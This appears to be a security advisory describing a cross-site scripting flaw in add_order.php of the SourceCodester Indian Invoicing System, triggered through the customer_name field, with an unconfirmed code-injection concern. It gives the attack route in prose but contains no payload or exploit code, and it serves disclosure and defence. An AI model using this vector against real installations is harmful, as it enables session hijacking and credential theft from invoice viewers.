A cross site scripting flaw exists in the add_order.php component of the SourceCodester Indian Invoicing System. By manipulating the customer_name argument, an attacker can inject arbitrary client‑side scripts that are rendered when an invoice template is displayed. The vulnerability stems from lacking proper encoding or validation of user input (CWE‑79) and the presence of a CWE‑94 marker suggests a potential weakness that could allow execution of malicious PHP code, although the description does not confirm this capability. Successful exploitation would allow an attacker to run JavaScript in the context of a victim’s browser, enabling session hijacking, credential theft, phishing, or defacement.

SourceCodester Indian Invoicing System, versions up to 0.x and 1.0. The vulnerability impacts the Invoice Template Render component and the add_order.php script, which processes customer_name inputs submitted by users. The flaw affects the system by rendering unescaped user input within invoice templates, exposing end users to client‑side script execution when viewing invoices.

The vulnerability can be exploited by sending a crafted request to the add_order.php endpoint with a malicious customer_name value. Because the trigger is remote and requires no authentication, an attacker can initiate the exploit from anywhere with network access to the web server. The medium CVSS score reflects the impact limited to client browsers, but the lack of mitigation measures such as input sanitization or a CSP increases the likelihood that the injected script will execute successfully. While exploitation of the potential PHP code execution path (CWE‑94) is not confirmed, the presence of this marker suggests that additional consequences could exist if advanced exploitation succeeds. Overall, the risk remains moderate to high for unpatched installations.